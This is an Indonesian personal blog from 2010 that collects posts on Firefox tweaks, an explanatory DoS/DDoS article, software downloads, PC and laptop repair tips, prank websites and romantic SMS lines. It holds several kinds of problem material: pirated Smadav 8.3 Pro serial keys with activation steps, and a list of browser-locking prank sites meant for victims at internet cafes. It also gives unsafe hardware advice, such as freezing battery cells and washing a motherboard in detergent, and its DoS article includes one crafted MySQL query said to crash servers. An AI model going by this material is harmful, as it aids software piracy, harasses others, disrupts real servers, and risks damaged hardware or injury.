Senin, 20 Desember 2010

firefox loe lambat???
masalah koneksi??
atau masalah speed kompi??
nie w ada trick buat ywa itung" bikin mempercepat firefox


Berikut langkah langkah tweaking browser firefox agar bekerja semaximal mungkin. Efeknya lumayan terasa saat membuka konten yang besar.

1. Ketik “about:config” pada address bar dan tekan enter. turunkan scroll kebawah dan cari entries berikut :

network.http.pipelining
network.http.proxy.pipelining
network.http.max-connections-per-server
network.http.pipelining.maxrequests
network.http.max-connections
network.http.max-persistent-connections-per-proxy
network.http.max-persistent-connections-per-server

Secara normal browser akan membuat satu request untuk satu halaman web dalam satu kali . ketika kamu enable pipelining, itu akan membuat beberapa halaman dalam sekali. dan akan mempercepat page loading

2. rubah entries berikut menjadi :

Set “network.http.pipelining” menjadi “true”

Set “network.http.proxy.pipelining” menjadi “true”

set “network.http.max-connections-per-server” menjadi 32.

set “network.http.max-connections” menjadi 60.

set “network.http.max-persistent-connections-per-proxy” menjadi 16.

set “network.http.max-persistent-connections-per-server” menjadi 8.

set “network.http.pipelining.maxrequests” menjadi nilai seperti “30?.

3.klik kiri (dimana saja) select New-> Integer. masukan “nglayout.initialpaint.delay” pada prefence name, kemudia set nilai menjadi “0?.

klik kiri sekali lagi (dimana saja) select New-> boolean. masukan “browser.tabs.showSingleWindowModePrefs” set menjadi “true”


cuma,ati" ywa....
ntar klo salah,malah" yang ada ga bisa buat browser lagi...
hhiiii

Selasa, 14 Desember 2010

Dalam artikel ini gw akan menjelaskan mengenai jenis serangan yang bisa dikatakan tidak ada obatnya, yaitu denial of service atau DoS. Bila serangan DoS ini dilakukan secara beramai-ramai dan terorganisir dengan baik, maka akan menghasilkan kerusakan yang dahsyat dan sanggup melumpuhkan situs-situs populer seperti twitter.com dan metasploit.com.

Apa itu DoS???

Denial of service adalah jenis serangan yang tujuannya adalah mencegah pengguna yang sesungguhnya menikmati layanan yang diberikan server. Server sesuai namanya adalah pelayan yang harus selalu siap melayani permintaan pengguna, yang umumnya beroperasi 24 jam tanpa henti. Contohnya adalah web server yang bertugas melayani pengunjung web menyediakan informasi dalam bentuk halaman html. Dalam kondisi normal, pengunjung dapat meminta resource dari web server untuk ditampilkan dalam browsernya, namun bila web server terkena serangan DoS maka pengunjung tidak bisa menikmati layanan web server.

Secara umum ada 2 cara melakukan serangan DoS:

1. Mematikan Server
2. Menyibukkan Server
* Tanpa bug/vulnerability
* Meng-exploit bug/vulnerability

DoS dengan Mematikan Server: Kill Them!

Anda pernah mengalami ingin memakai telepon umum atau ATM namun tidak bisa karena di mesin tersebut ditempel kertas berisi pesan “Out of Service” atau “Sedang dalam perbaikan”. Telepon umum adalah target serangan DoS yang biasa terjadi, dimana-mana kita menemukan telpon umum yang rusak karena serangan DoS seperti membanting gagang telpon, mencabut kabel, memecahkan LCD dan aksi-aksi lainnya.

Tujuan serangan ini adalah membuat server shutdown, reboot, crash, “not responding”. Jadi serangan ini menghasilkan kerusakan yang sifatnya persisten artinya kondisi DoS akan tetap terjadi walaupun attacker sudah berhenti menyerang, server baru normal kembali setelah di-restart/reboot.

Bagaimana cara serangan DoS ini dilakukan? Serangan ini dilakukan dengan meng-exploit bug/vulnerability pada server. Kata kunci pada vulnerability jenis ini biasanya adalah “specially/carefully crafted packet/request”, yang artinya paket yang dirancang khusus. Kenapa dirancang khusus? Sebab dalam paket itu mengandung sifat tertentu yang membuat server mati ketika mengolah paket khusus itu.

Mari kita perhatikan beberapa contoh vulnerability yang berakibat pada DoS attack:

* Ping of Death ( CA-1996-26 )

Ini adalah jenis bug yang sudah sangat tua. Praktis sudah tidak ada lagi sistem yang vulnerable terhadap bug ini. Bug ini bila diexploit akan membuat server crash, freeze atau reboot. Serangan ini dilakukan dengan mengirimkan “specially crafted” paket berupa oversized ICMP packet, yaitu paket yang ukurannya di atas normal. Ketika server menerima dan memproses paket yang “aneh” ini, maka server akan crash, freeze atau reboot. Ini adalah contoh serangan DoS “one shot one kill” karena bisa merusak server hanya dengan satu tembakan saja.
* MySQL IF Query DoS ( SA25188 )

Bug ini akan membuat mysql server menjadi crash hanya dengan mengirim sql khusus yang mengandung fungsi IF() contohnya: “SELECT id from example WHERE id IN(1, (SELECT IF(1=0,1,2/0)))”. Ini juga jenis serangan “one shot one kill”.

* Cisco Global Site Selector DNS Request Denial of Service (SA33429)

Bug ini membuat DNS server Cisco mati dengan mengirimkan beberapa “specially crafted” paket request DNS dalam urutan tertentu.

Tiga contoh di atas kiranya cukup memberikan gambaran tentang bagaimana serangan DoS jenis ini dilakukan. Pada intinya adalah attacker memanfaatkan (baca:mengexploit) bug yang membuat server berhenti bekerja dan biasanya dilakukan sendirian secara remote dengan mengirimkan specially crafted packet.

DoS dengan Menyibukkan Server: Make Them As Busy As Possible!

Pada waktu menjelang lebaran kita sering merasa begitu sulit mengirim sms, bahkan sering terjadi gagal kirim. Begitu juga ketika berlangsung acara kuis di TV, mengelpon ke nomor untuk menjawab kuis terasa begitu sulit. Hal ini terjadi karena ada begitu banyak orang yang mengirim sms pada saat lebaran dan menelpon pada waktu kuis sehingga membuat jaringan telekomunikasi menjadi begitu sibuk sampai tidak bisa melayani pengguna lain. Peristiwa itu mirip dengan yang terjadi ketika sebuah server mendapat serangan denial of service. DoS yang terjadi pada peristiwa tersebut bukan jenis DoS yang mematikan server, namun jenis DoS yang menyibukkan server.

Jenis DoS ini bersifat sementara, server akan kembali normal bila attacker berhenti mengirimkan request yang membuat sibuk server.

DoS jenis ini terbagi lagi menjadi 2 jenis berdasarkan cara melakukan serangan:

* Exploiting vulnerability: Menyerang dengan malicious request/packet
* No vulnerability exploitation: Menyerang dengan normal request/packet

Membuat server sibuk dengan mengexploitasi vulnerability lebih cepat daripada tanpa mengeksploit vulnerability.

Make Server Busy by Exploiting Vulnerability

Dalam serangan DoS jenis ini, attacker memanfatkan bug yang membuat server berlebihan dalam menggunakan resource (cpu,memory,disk space dsb). Attacker akan mencari cara bagaimana agar membuat server bekerja ekstra keras (jauh lebih keras dari request normal) untuk melayani request dia. Biasanya serangan DoS jenis ini tidak berupa serangan “one shot one kill”. Serangan dilakukan dengan melakukan banyak request dengan setiap request membuat server mengonsumsi lebih banyak resource dari request yang normal.

Dalam hitungan matematika sederhana, bila attacker bisa membuat server bekerja selama 10 detik hanya untuk melayani dia (misal normalnya 0,1 detik), maka attacker bisa mengirimkan request 1.000x untuk membuat server melayani dia selama 10.000 detik (2,7 jam lebih) sehingga membuat pengguna lain tidak bisa menikmati layanan server.

Untuk lebih memahami DoS jenis ini, mari kita lihat contoh-contoh vulnerability yang bisa diexploit untuk melancarkan serangan DoS jenis ini:

* TCP SYN Flood DoS

Ini adalah serangan DoS yang sudah sangat tua. Attacker menyerang dengan cara membanjiri server dengan malicious request berupa paket SYN dengan fake source IP address. SYN packet adalah paket dari client yang mengawali terbentuknya koneksi TCP/IP, setelah itu server akan membalas dengan SYN-ACK, dan dilengkapi dengan paket SYN-ACK-ACK dari client, tiga proses ini disebut three way handshake.

Triknya adalah pada fake source ip address pada paket SYN dari client. Akibatnya server akan mengirim SYN-ACK (step 2) ke ip address yang salah sehingga server juga tidak akan mendapatkan balasan SYN-ACK-ACK dari client. Padahal untuk setiap client yang mencoba membuka koneksi, server akan mengalokasikan resource seperti memori dan waktu untuk menunggu datangnya balasan ACK dari client. Dengan cara ini attacker menghabiskan resource server hanya untuk melayani request palsu dari attacker.
* Apache mod_deflate DoS

Apache menggunakan mod_deflate untuk memampatkan file. Bila visitor meminta sebuah file, maka apache akan menggunakan mod_deflate untuk memampatkannya kemudian mengirimkan ke visitor tersebut. Namun bila di tengah proses pemampatan, visitor memutuskan koneksi TCP, Apache masih terus bekerja memampatkan file untuk visitor yang sebenarnya sudah tidak ada (sudah disconnect). Jadi bugnya adalah pada borosnya pemakaian resource cpu untuk memampatkan file untuk client yang sudah tidak ada.

Attacker memanfaatkan kelemahan ini dengan meminta sebuah file yang berukuran besar, kemudian dalam waktu singkat memutuskan koneksi sehingga membuat server bekerja keras mempatkan file untuk visitor yang sudah tidak ada. Request ini diulang berkali-kali sampai server begitu sibuknya dan semua resource cpu habis.

Dua contoh vulnerability di atas cukup menjelaskan bagaimana serangan DoS jenis ini dilakukan. Pada intinya adalah dengan mengirim banyak malicious request/paket yang membuat server mengonsumsi resource lebih banyak dan lebih lama untuk setiap requestnya.

Make Server Busy Without Exploiting Vulnerability

Ini adalah jenis serangan yang mengandalkan pada kemampuan mengirimkan normal request sebanyak-banyaknya sehingga server menjadi sibuk. Perbedaan DoS jenis ini dengan DoS yang mengexploit vulnerability adalah pada requestnya. Request yang dikirimkan pada DoS jenis ini adalah request yang normal seperti yang dilakukan pengguna biasa, sehingga server tidak mengonsumsi resource berlebihan. Sedangkan DoS yang mengandalkan vulnerability mengirimkan specially crafted malicious request untuk membuat server mengonsumsi resource lebih banyak untuk melayani malicious request tersebut.

Normal request hanya membuat server mengonsumsi resource dalam jumlah biasa-biasa saja, tidak akan mengganggu kerja server secara keseluruhan. Diperlukan normal request dalam jumlah yang sangat banyak untuk membuat server terganggu kerjanya. Jadi agar serangan ini menjadi efektif, maka serangan harus dilakukan beramai-ramai dari banyak tempat, semakin banyak penyerang semakin bagus hasilnya. Serangan ini juga disebut dengan distributed DoS (DDoS) karena dilakukan dari banyak lokasi yang terdistribusi (tersebar).

Serangan DDoS dilakukan dengan menggunakan komputer zombie atau robot. Zombie adalah komputer yang sudah dikuasai attacker sehingga bisa dikendalikan dari jarak jauh. Sekumpulan komputer zombie membentuk jaringan yang disebut bot-net. Attacker mendapatkan banyak zombie dengan menyebarkan virus atau worm, setiap komputer yang terinfeksi akan diinstall program yang membuat komputer bersedia menjalankan perintah dari attacker.

DDoS Botnet Attack
Courtesy of: www.dos-attack.net

Gambar di atas menjelaskan cara kerja DDoS. Attacker memberi perintah kepada semua pasukannya untuk membuat request HTTP ke sebuah website. Bila pasukan yang dikuasai attacker sangat besar, maka web server akan dibanjiri request sehingga menjadi terlalu sibuk dan tidak bisa diakses oleh pengguna yang sebenarnya (real visitor).

Serangan jenis ini tidak ada obatnya karena attacker tidak meng-exploit bug atau vulnerability apapun. Bila pada jenis DoS yang lain, serangan dapat dicegah dengan melakukan patching atau update software, maka serangan ini tidak bisa dihentikan dengan update atau patch.

Kesimpulan

Denial of service adalah serangan yang membuat server tidak bisa melayani pengguna yang sesungguhnya. Berikut adalah jenis-jenis serangan DoS berdasarkan cara melakukan serangan:

* Mematikan Server: one shot, one kill untuk membuat server menjadi crash, hang, reboot.
* Menyibukkan Server: mengirim banyak sekali request untuk membuat server sibuk.
o Exploiting bug: mengirim banyak specially crafted request. Jumlah request tidak sebanyak jenis DoS yang menyibukkan server dengan normal request.
o Normal request: mengirim banyak request normal seperti pengguna biasa. Diperlukan jumlah request yang lebih banyak dibandingkan jenis DoS yang menyibukkan server dengan exploit bug. Biasanya menggunakan botnet secara terdistribusi.

Rabu, 08 Desember 2010

mozilla Firefox????
udah jadi pilihan kedua buat gW...
kenapa??




cZ ada yang semacam firefox,tapi lebih cepat,
w akuin sich,memank hampir persis sama firefox,tp w rasa 2x lebih cepat
karena w sendiri ngerasain juga begitu...
lagisn juga udah mengintegrasikan facebook dan twitter..
mantabb bro...
liat ajja nie




yang minat,langsung ajja sedoooooootttttttttt

Download yuuk


maybe ada yang butuh speed fan....
apa sich feature speed fan???
lumayan sichhh



SpeedFan merupakan sebuah program yang dapat dipergunakan oleh
Loe untuk memonitor tegangan listrik, kecepatan perputaran kipas,
dan temperatur di dalam komputer dengan memanfaatkan sejumlah
chip yang terpasang di dalamnya.

dan mungkin masih banyak lagi....
hhehheee
cekodot....



mau download???
klik link di bawah ini ajja


DOwnload yuukkk

Senin, 06 Desember 2010

Mungkin bagi para master merupakan hal yang biasa, jadi tips ini buat yang belum biasa aja dech he..he..

Terkadang, komputer kita bakal menjadi lambat setelah beberapa lama dipakai. Apalagi kalo kita banyak menggunakan software yang berat2 seperti Adobe Photoshop, Corel Draw, Sony Soundforge dsb.

Biasanya setelah kita pakai aplikasi tersebut, komputer kita terasa lambat. Kemungkinan itu terjadi karena masih ada bekas data yang tersimpan dalam RAM, sehingga komputer kita pun jadi lambat.





Salah satu cara untuk membersihkan RAM adalah dengan merestart komputer terlebih dahulu. Tapi kayanya ribet banget ya?

Gue punya cara yang lebih simpel yang bisa dilakuin oleh semua kalangan, awam maupun mahir. Perhatikan caranya di bawah ini:
1. Klik kanan mouse di desktop, pilih New - Shortcut.

2. Ketik %windir%\system32\rundll32.exe advapi32.dll,ProcessIdleTasks pada kolom isian yang muncul.

3. Klik Next.

4. Beri nama shortcut tadi, nama yang dapat diberikan bebas sesuai keinginan kamu, atau kamu lewat aja, namanya otomatis jadi rundll32.exe.

5. Klik Finish.
Kapan aja komputer kamu terasa lambat, klik shortcut yang udah kamu buat tadi untuk membersihkan RAM. Sebetulnya prinsip kerjanya mungkin sama aja kaya RAM Booster atau aplikasi sejenisnya, tapi ga kalah ko seperti software2 lainnya. Selamat mencoba, semoga bermanfaat.



Buat kalian yang pernah merasa sebel karena batery laptop yang sudah SOAK, anda tidak perlu mengganti dulu batery tersebut karena ada beberapa langkah yang dapat anda lakukan untuk menyelamatkan batery laptop anda.
Cara pertama yang akan saya beritau mungkin memang sedikit tidak masuk akal, caranya yaitu bongkar casing, susunan batrey di bungkus rapat kedalam plastik, lalu masukan dalam freezer kulkas selama 3-4 hari.






Cara ini pernah di pakai dalam trik mengatasi batrey Handphone, tetapi dapat juga kita lakukan pada batery laptop. Setelah setelah cara ini di coba, kembali seperti semula kemudian di cas 8 jam tanpa menyalakan LAPTOP.
Jika cara pertama telah berhasil dilakukan maka anda tidak perlu melanjut ke langkah kedua, tapi jika belum berhasil, silakan baca langkah kedua
Mengecek batrey-batrey tersebut dengan AVO meter, apakah batery tersebut sudah rusak atau masih OK.

biasanya tidak semua batrey rusak

Terus ganti saja batrey rechargble yang rusak, biasanya antara 1-3 buah saja.
Lantas susun kembali seperti susunan semula, bungkus chasing dan dicas dengan cara seperti cara pertama, 8 jam dengan keadaan mati.

Hal lain yang harus diperhatikan juga adalah chargernya, karena menurut pengalaman batrey laptop yg lemah bukan selalu pada batreynya itu sendiri, charger batrey juga harus di cek apakah jumlah voltase dan amperenya memang sudah sebanding, atau terlalu kecil atau terlalu besar.
Buat tambahan:"ingat yang biasa beli laptop second itu chargernya tidak selalu Original, coba cek lagi dengan AVO meter. Apakah sesuai dengan keterangan stiker yg di tempel pada casing charger ????
jika tidak sesuai beli aja atau bagi yg duitnya mepet coba rakit sendiri."



hhehheee.....
by dwipangga
Langsung saja, disini saya akan membagikan sebuah cara untuk melepon secara GRATIS ke no.HP, telpon gratis yang saya maksud disini adalah Evaphone yaitu salah satu layanan web yang menyediakan panggilan telepon Internet gratis. Tidak diperlukan pendaftaran atau perangkat yang mesti di download.







Langkah pertama adalah menyiapkan bahan-bahannya terlebih dahulu:
1. Sebuah komputer/ laptop/ netboook yang konek dengan internet
2. microfon dan speaker/ headset

Langkah kedua adalah melakukan panggilan tersebut

1. Buka situs Evaphone klik disini
2. Masukkan nomor telepon yang ingin Anda panggil dan tekan call button.
3. Sistem akan memutar nomor yang Anda tekan, namun, ada selingan iklan video yang mesti Anda saksikan sebelum Anda dapat dihubungkan ke nomor tersebut.

Format pengisian nomor telepon:
1. Pada colum pertama pilih Indonesia
2. Pada colum kedua misalnya isi: 62217654321
- 62 (Kode Negara Indonesia)
- 21 (Kode Wilayah Kota)
- 7654321 (Nomer Tujuan)

1. Limit panggilan yang dibatasi per hari. Anda akan mendapat informasi tentang hal itu setelah panggilan gratis yang digunakan terlampaui.
2. Lama panggilan terbatas dan tergantung pada negara mana Anda melakukan panggilan. Ini bervariasi dari durasi 0.10 menit hingga 4 menit per panggilan.

* Jika Anda menginginkan panggilan dengan tanpa batasan, Anda dapat menggunakan layanan premium yang ditawarkan dengan harga wajar, cukup dengan melakukan proses registrasi.






Maksud dari judul yang saya cantumkan diatas adalah bahwa cara ini merupakan cara yang dapat digunakan untuk menyelamatkan mobo kita yang sudah matot alias mati total...
NB: jangan gunakan cara ini pada mobo yang masih hidup...karena presntasi keberhasilannya hanya 50%





caranya:
1. Cabut semua komponen yang menempel pada mobo, mulai dari batu CIMOS, memory, prosesor, pokoknya semuanya..

2. Diamkan selama 3hari, tujuannya agar tidak ada listrik lagi yang tersisa dalam mobo tersebut...karena jika masih ada aliran listrik, nanti akan terjadi konslet..sehingga mobo tersebut sudah benar-benar mati...untuk lebih amannya simpan selama lebih dari 3hari
3. Setelah dirasa mobo sudah bersih dari aliran listrik...siapkan air sabun, biasanya air campur deterjen..lalu siramkan sedikit demi sedikit...jangan sikat menggunakan sikat...pakai saja kuas...jangan lupa bersihkan slot-slotnya
4. Setelah selesai jemur mobo tersebut..lama penjemurannya tergantung panas lingkungannya...bila sangat cuaca panas mungkin 4 jam sudah bisa..tetapi bila cuacanya tidak terlalupanas penjemurannya bisa lebih dari 4 jam...
5. Setelah dirasa penjemuran dirasa sudah cukup sekarang diamkan dalam ruangan...kalau ada semprot menggunakan hairdryer..jangan lupa pada slotnya..supaya benar2 kering...
6. coba mobo tersebut..


Cara ini sebenarnya digunakan untuk membersihkan mobo dari debu...jika kerusakan mobo karena debu mungkin bisa hidup lagi...tapi jika karena sebab lain mungkin tidak bisa...

penyebab kegagalan:
1. Setelah dicuci mobo tidak benar2 kering
2. kerusakan mobo bukan karena debu
3. masih ada listrik dalam mobo, sehingga terjadi konslet...

semoga tips ini bermanfaat...





Anda yang sudah menggunakan Windows Vista atau Windows Seven tentu sudah mengenal sidebar yang berisi gadget. Untuk Anda yang masih menggunakan Windows XP Anda harus menginstall aplikasi terpisah yang mirip dengan Windows Sidebar tersebut.







Salah satunya adalah Thoosje’s Windows 7 sidebar 1.0. Thoosje’s Windows 7 sidebar merupakan sidebar yang secara default menyertakan sekitar 20 gadget populer, misalnya sticky notes, calendar, analog clock, media player, POP3 mail retriever, cpu gadget dan RSS reader.

Sidebar tersebut selain akan mempercantik tampilan desktop, juga untuk menampilkan beragam informasi seperti penggunaan cpu dan ram, jam, status battery, dan lain-lain.

Jika Anda tertarik dengan Thoosje’s Windows 7 sidebar 1.0, Anda bisa download di bawah ini.


DOWNLOAD YUUK

Para pengguna komputer yang menggunakan banyak aplikasi dalam bekerja seringkali menghadapi kesulitan, karena untuk menjalankan suatu aplikasi dan berganti dari satu aplikasi ke aplikasi lain cukup merepotkan. Untuk memudahkan segalanya, mereka dapat menggunakan antarmuka tambahan berupa Dock. Dock adalah antarmuka tambahan yang menyediakan cara yang mudah untuk menjalankan serta berganti antara beberapa aplikasi dengan mudah.





Winstep Nexus adalah sebuah sistem docking yang sangat baik, namun untuk saat ini hanya tersedia untuk sistem operasi Windows saja. Nexus adalah Dock yang membuat bekerja dengan beberapa aplikasi menjadi sangat mudah, dan bahkan terasa lebih menyenangkan. Kita dapat mengakses aplikasi, folder, serta dokumen yang sering kita gunakan hanya dengan sekali klik saja. Nexus tersedia dalam dua versi, yaitu Winstep Nexus (gratis) dan Nexus Ultimate.





Berikut adalah beberapa fitur dari Winstep Nexus:

* Menampilkan daftar aplikasi yang sedang digunakan didalam Dock yang dapat diatur dengan grouping, filtering, serta icon customization.
* Menampilkan system tray pada Dock sebagai icon individual atau group.
* Efek samar dan efek warna yang menarik pada latar belakang Dock.
* Memonitor koneksi yang aktif dan penggunaan bandwidth dengan modul Net Meter
* Beberapa efek mouse over, seperti zoom, swing, bounce, dan sebagainya.

Masih banyak sekali fitur dari Winstep Nexus yang belum disebutkan diatas. Untuk mengetahui lebih jauh, akan lebih baik jika anda langsung mencobanya. Anda dapat mengunduh Winstep Nexus di website resmi nya http://www.winstep.net/

hhehhee....
web ngerjain orang ??
parah amat. . .
apalagi di warnet target kita. . .
hhehhe...kesian yee. . .
cekidot lah. . .







target utama sebenernya mozilla firefox
sebenernya ntu hanya manipulasi javascript yang ada di firefox
dibawah ini merupakan situs yang memang ready javasript..
coba aja ndiri klo ga percaya. .
(resiko di tanggung sendiri ywa...)
hheee....







http://www.d1gdo.com/images/


www.subang.co.tv

www.1227.com

www.killerjo.net

http://members.home.nl/saen/Special/Zoeken.swf
(situs yang cume ngagetin doank,cz ada penampakan doank ntu)
nie gambarnya

http://www.themobiletracker.com/

http://www.nobrain.dk/


langkah antisipasi bila dah terlanjur sebenarnya gampang,kagak perlu ampe restart komputer,tp cukup teken ctrl+alt+del
nah,kluar ntu taks manager...
tinggal di kill deh firefox nya. . .
gampang kan.. .


Rabu, 01 Desember 2010

Smadav loe masih free???
hadoh. . . .
haree gene masih jaman pake yang free smadav???
wkkkwkkwkw
tanang broo. . .
gw bagi serial key Smadav 8.3 pro










ywa walaupun pake nama orang,yang penting smadav u bisa pro kan. . .
hhahhahhaa
Panduan Instalasi Key Smadav 8.3
1.Aktivkan Smadav 8.3 loe
2.Pada Smadav 8.3 klik menu SETTING
Pada Registrasi Smadav Pro masukkan seperti dibawah ini:

Nama: anti-pembajakan
Key: (key dikosongkan jangan di isi)
Lalu klik Register

Setelah itu baru loe masukkan salah satu dari 3 nama dan key dibawah ini:

Berikut Key nya:

1. Type : Personal
Nama : www.imtikhan.tk
Key : 081300492151

2. Type : Warnet
Nama : www.imtikhan.co.cc
Key : 775277556055

3. Type : Perusahaan
Nama : www.imtikhan.co.tv
Key : 993899551540


udah yee. . .
segitu juga cukup...
ntar kalo ada lagi yang patut w share,bakal w bagi koQ. . .
kalem broo...

by Dwipangga

Minggu, 28 November 2010

selingan yukkk...
baggi kaum cowok,sekedar share ajja nie,....
sample sms puitis abizzz bak pujangga yang lagi nyari rokok...
hhehehheeee
di liat ajja...
di ambil juga boleh koQ

namanya juga kata-kata romantis
hhee
selingan yukkk...
baggi kaum cowok,sekedar share ajja nie,....
sample sms puitis abizzz bak pujangga yang lagi nyari rokok...
hhehehheeee
di liat ajja...
di ambil juga boleh koQ
kumpulan sms cinta yg meluluhkan hati

Seperti berobat, yang terpenting bukan obatnya, tapi keinginanmu untuk sembuh. Begitu pula menaklukkan hati, yang terpenting bukan ungkapannya, tapi kesungguhanmu untuk mencintainya.

Semoga lekas sembuh, eh, jatuh!

(1) Tadi malam aku kirim bidadari untuk menjaga tidurmu. Eh, dia buru-buru balik. Katanya, ‘Ah, masa bidadari disuruh jaga bidadari?’

(2) Kalau kamu nanya berapa kali kamu datang ke pikiranku, jujur aja, cuma sekali. abisnya, ga pergi2 sih!

(3) Sempet bingung jg, kok aku bisa senyum sendiri. Baru nyadar, aku lagi mikirin kamu.

(4) Kalau suatu saat kamu hancurkan hatiku… akan kucintai kamu dengan kepingannya yang tersisa.

(5) Berusaha melupakanmu, sama sulitnya dengan mengingat seseorang yang tak pernah kukenal.

(6) Kalau kamu ajak aku melompat bareng, aku ngga bakalan mau. Mending aku lari ke bawah, bersiap menangkapmu.

(7) Aku pernah jatuhkan setetes air mata di selat Sunda. Di hari aku bisa menemukannya lagi, itulah waktunya aku berhenti mencintaimu.

(8) Ga usah janjiin bintang dan bulan untuk aku, cukup janjiin kamu bakal selalu bersamaku di bawah cahayanya.

(9) Kalau kamu nanya mana yg lebih penting buat aku: hidupku atau hidupmu, aku bakal jawab hidupku. Eits, jangan marah dulu, karena kamulah hidupku.

(10) Pertama ketemu, aku takut ngomong sama kamu. Pertama ngomong sama kamu, aku takut kalau nanti suka sama kamu. Udah suka, aku makin takut kalau jatuh cinta. Setelah sekarang cinta sama kamu, aku jadi bener2 takut kehilangan kamu. Kamu emang menakutkan!

(11) Ketika hidup memberiku seratus alasan untuk menangis, kau datang membawa seribu alasan untuk tersenyum.

(12) Jika aku bisa jadi bagian dari dirimu, aku mau jadi airmatamu, yang tersimpan di hatimu, lahir dari matamu, hidup di pipimu, dan mati di bibirmu

(13) Wah, ini angka sial. Udah dulu ya… Soal sms-sms itu, ga usah nanya dari mana sumbernya, selama Anda bisa membuatnya datang dari hati.

(14) Plis aku butuh bantuan kamu. Soalnya, kunci buat membuka pintu kebahagiaanku, ga tau napa, ada padamu.

(15) Ketika mencintaimu, aku mendapat kekuatan. Mendapat cintamu, aku beroleh keberanian. Kamu wonderwoman, yang membuatku ngerasa jadi superman. Kalimat terakhir bisa dibalik sesuai keperluan. Atau diulang, kalo kamu berdua makhluk sejenis, kek kasus Ryan .

(16) Ayolah tinggal sesukamu di dalam hatiku. Janji, aku ngga bakalan ngutip uang kontrakan.

(17) Cintaku denganmu memang tak akan berkahir bahagia, karena yang kutawarkan untukmu adalah cinta yang tak punya akhir.

(18) Izinkan aku membaca nada-nada di dalam jiwamu, untuk kunyanyikan saat kau mungkin sudah lupa lirik-liriknya.

(19) Katanya orang bisa jadi bodoh karena cinta, tapi aku ngga peduli itu. Aku cuma mikir, betapa bodohnya mantanmu, yang berhenti mencintaimu.

(20) Kau begitu kucinta, hingga ketika bersamamu mati seperti bisa kutunda, dan tanpamu, hidup serasa tiada guna.

(21) Senyummu seperti sebuah undangan buat imajinasiku, untuk terbang sejauh-jauhnya, berkembang seliar-liarnya.

(22) Aku tak pernah tau kebahagiaan sesungguhnya, sampai ketika aku mendapatkan cintamu. Dan aku tak pernah tau derita sebenarnya, sampai aku kini kehilangan itu. Terima kasih telah mengenalkanku pada kedua rasa yang tak akan kulupa.

(23) Jika aku ngga bisa mencintaimu seperti yang kamu inginkan, bukan berarti aku ngga mencintaimu dengan semua yang kupunya.

(24) Haruskah aku tersenyum penuh bahagia karena menjadi sahabatmu, atau menangis dalam perih derita, karena tak bisa lebih dari itu.

(25) Di antara jemarimu, diciptakan ruang kosong, agar ada tempat untuk diisi oleh jemariku.

(26) Jangan bilang kamu mencintaiku, kecuali dengan kesungguhan. Karena bisa saja aku melakukan hal yang paling gila, dengan mempercayainya.

(27) Memikirkanmu, aku jadi malas tidur. Soalnya, hidupku kini jauh lebih indah dari impian manapun.

(28) Aku selalu berusaha tak menangis karenamu, karena setiap butir yang jatuh, hanya makin mengingatkan, betapa aku tak bisa melepaskanmu.

(29) Kamu ga pernah bisa kuusir dari pikiranku. Ya udah, mungkin tempatmu emang di sana.

(30) Ketika kamu menutup diri, aku tau bukan untuk membuatku pergi. Kamu cuma ingin tahu, apakah aku cukup kuat untuk membukanya. (Yang ini sok PD kekna ya)

(31) Aku sadar, mencintaimu sama saja menyerahkan padamu kekuatan untuk menghancurkanku. Tapi aku percaya, kau tak akan menggunakannya untuk itu.

(32) Kamu tau, napa aku sedih tadi malam? Aku duduk di dekat seseorang yang paling berarti buatku, namun aku sadar baginya aku mungkin tak berarti apapun. (Yang ini, kalo dia punya rasa dikiiiit aja, pasti dibales deh).

(33) Tak mungkin aku berhenti mencintaimu. Aku hanya bisa belajar hidup tanpamu.

(34) Aku ingat kamu ketika seneng, karena aku selalu ingin berbagi kebahagiaan denganmu. Ingat kamu ketika sedih, karena kamu orang yang selalu mengerti perasaanku. Ingat kamu ketika ketawa ato nangis, karena kamu selalu membuat tawaku semakin lebar, dan membuat air mataku berhenti keluar.

(35) Walau kau buat aku menangis, aku tetap mengkhawatirkan keadaanmu. Walau kau semakin acuh, aku malah makin merindukanmu. Bahkan jika kau sebenarnya telah beralih kepada yang lain, aku akan berusaha berbahagia untukmu.

(36) Gimana kalo kita berdua jadi komplotan penjahat: Aku mencuri hatimu, dan kamu mencuri hatiku…

(37) Mereka bilang waktu akan mengobati semuanya. Masalahnya, tanpa kamu di sini, waktu seperti berhenti.

(38) Kamu membuatku tersenyum, tanpa sebab apapun. Membuatku tertawa, walau tak ada yang lucu. Sialnya, kamu juga membuatku jatuh, pada saat aku semestinya menjauh.

(39) Aku tak mungkin bisa mengatasi semua masalah yang menimpamu. Tapi aku janji, bakal selalu bersamamu untuk menghadapinya.

(40) Tadi malem, pas mikirin kamu, air mataku netes. Aku nanya napa dia keluar. Katanya, “Ada yang penting banget kykna di mata kamu, segitu pentingnya sampe ga ada tempat buat aku. Ya udah, mending aku keluar aja”

(41) Hari ini aku menangis bukan karena merindukanmu, atau mendambamu kembali. Tapi karena akhirnya aku sadar, aku bakal baik-baik saja tanpamu.

(42) Napa aku ga pernah bisa membencimu, saat kamu buat perasaanku tercabik-cabik?

(43) Dulu aku heran, napa orang sampe berantem ‘hanya’ karena cinta. Trus aku inget muka kamu, dan tiba-tiba, aku merasa siap menghadapi Perang Dunia Ketiga.

(44) Sejujurnya, kadang aku sembunyi, karena ingin kamu temukan. Menjauh karena ingin kamu ikuti. Menangis karena ingin kamu tenangkan. Menjatuhkan diri, karena ingin kamu tangkap.

(45) Aku pengen bersamamu cuma pada dua waktu: SEKARANG dan SELAMANYA.

(46) Jangan GR deh. Aku kangen kamu sedikit aja kok. Sedikit berlebihan maksudnya. (Untuk menghormati Valentino Rossi, pembalap pujaanku yg selalu pake nomor ini, sampe di sini dulu ya…)

(47) Andai sebuah bintang akan jatuh setiap kali aku mengingatmu, bulan pasti protes. Soalnya dia bakal sendirian di angkasa.

(48) Kamu selalu punya cara buat aku ketawa, saat aku bahkan lagi ngga pengen tersenyum. Gila kamu ya!

(49) Kamu membuatku sekarang ngerti, hal paling sakit itu bukan sendiri, tp dilupakan seseorang yang ngga bisa aku lupakan.

(50) Selama ini aku ngga nyadar kalo namaku ternyata keren juga, sampe saat aku denger sendiri kamu membisikkannya.

(51) Cuma ada satu masalah ketika aku bermimpi tentangmu… ketika aku harus terbangun.

(52) Temen-temenku nanya, apa sih yang aku lihat di diri kamu? Aku diem aja. Soalnya, kalau aku cerita, bisa-bisa mereka bakal suka juga.

(53) Cuma dengan mikirin besok masih bisa sama kamu, kayaknya gampaaang banget melalui hari ini.

(54) Aku yakin bisa menaklukkan dunia hanya dengan satu tangan, selama kamu menggenggam erat tanganku yang satu lagi.

